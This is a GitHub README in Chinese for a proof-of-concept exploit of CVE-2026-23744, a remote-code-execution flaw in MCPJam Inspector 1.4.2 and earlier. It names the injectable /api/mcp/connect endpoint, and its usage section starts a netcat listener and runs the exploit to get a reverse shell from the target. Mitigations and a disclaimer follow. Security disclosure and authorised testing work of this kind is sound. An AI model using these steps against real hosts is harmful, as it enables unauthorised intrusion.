TYehan/CVE-2026-23744
GitHub: TYehan/CVE-2026-23744
CVE-2026-23744漏洞利用工具
Stars: 0 | Forks: 0
# CVE-2026-23744 - MCPJam Inspector RCE 漏洞 PoC
**CVE-2026-23744** 的 Proof of Concept 漏洞利用:MCPJam Inspector <= 1.4.2 的远程代码执行 (RCE) 漏洞
**作者:** TYehan
## 概述
MCPJam Inspector 是一个用于 MCP (Model Context Protocol) 服务器的本地优先开发平台。版本 1.4.2 及更早版本存在一个严重的远程代码执行 (RCE) 漏洞,允许攻击者向目标系统发送精心制作的 HTTP 请求,从而触发任意命令执行。
### 漏洞详情
- **CVE ID:** CVE-2026-23744
- **受影响版本:** MCPJam Inspector <= 1.4.2
- **漏洞类型:** 远程代码执行 (RCE)
- **严重程度:** 严重
- **CVSS 分数:** 9.8 (严重)
此漏洞比 CVE-2025-49596 更严重:
- **CVE-2025-49596:** 需要用户交互(点击恶意链接)
- **CVE-2026-23744:** 无需用户交互即可利用
由于 MCPJam Inspector 默认监听 `0.0.0.0` 而不是 `127.0.0.1`,攻击者可以通过简单的 HTTP 请求远程触发 RCE。
## 技术细节
漏洞存在于 `/api/mcp/connect` 端点,允许攻击者通过 `serverConfig` 参数注入恶意命令。这导致在主机系统上执行任意代码。
## 安装
### 先决条件
- Python 3.7+
- pip
### 设置
```
# 克隆或下载此仓库
cd CVE-2026-23744
# 安装所需依赖
pip install -r requirements.txt
```
## 使用
### 基本利用
```
# 在您的机器上启动监听器(例如,端口 4444)
nc -lvnp 4444
# 运行漏洞利用程序
python CVE-2026-23744.py --url http://target-ip:8000 --lhost YOUR_IP --lport 4444
```
### 测试漏洞(不执行 RCE)
```
# 测试目标是否易受攻击
python CVE-2026-23744.py --url http://target-ip:8000 --lhost YOUR_IP --lport 4444 --test
```
### 参数
| 参数 | 必需 | 描述 |
|------|------|------|
| `--url` | 是 | 目标 MCPJam Inspector URL(例如,`http://192.168.1.100:8000`) |
| `--lhost` | 是 | 您的本地机器 IP(反向 shell 的攻击者 IP) |
| `--lport` | 是 | 您的监听端口(用于反向 shell 连接) |
| `--test` | 否 | 测试目标是否易受漏洞攻击而不执行 RCE |
## ⚠️ 声明
**仅限教育和授权测试使用**
此漏洞利用提供用于:
- 教育目的
- 授权安全测试
- 演示 PoC
- 授权渗透测试活动
**未经授权访问计算机系统是非法的。** 仅在您拥有或明确获得测试权限的系统上使用此 PoC。作者不对误用承担责任。
## 缓解措施
1. **立即** 更新到 MCPJam Inspector 版本 > 1.4.2
2. **限制网络访问** 到 MCPJam Inspector(使用防火墙规则)
3. **绑定到 localhost** 而不是 0.0.0.0
4. **为 `/api/mcp/connect` 端点实现身份验证**
## 参考资料
- [MCPJam Inspector GitHub](https://github.com/mcpjam/inspector)
- [CVE Details](https://cve.mitre.org/)
## 许可证
此 PoC 提供为教育和授权安全测试目的。
标签:CVE-2026-23744, CVSS, Google搜索, Go语言工具, HTTP请求, Linux取证, Maven, MCPJam Inspector, MCP服务器, Python, RCE, RuleLab, 威胁模拟, 安全测试, 安全漏洞, 安全风险, 攻击向量, 攻击性安全, 攻击者可利用, 无后门, 无用户交互, 本地开发平台, 模型上下文协议, 漏洞评分, 漏洞验证, 端口监听, 编程工具, 网络信息收集, 网络安全审计, 规避防御, 远程代码执行, 逆向工具, 默认配置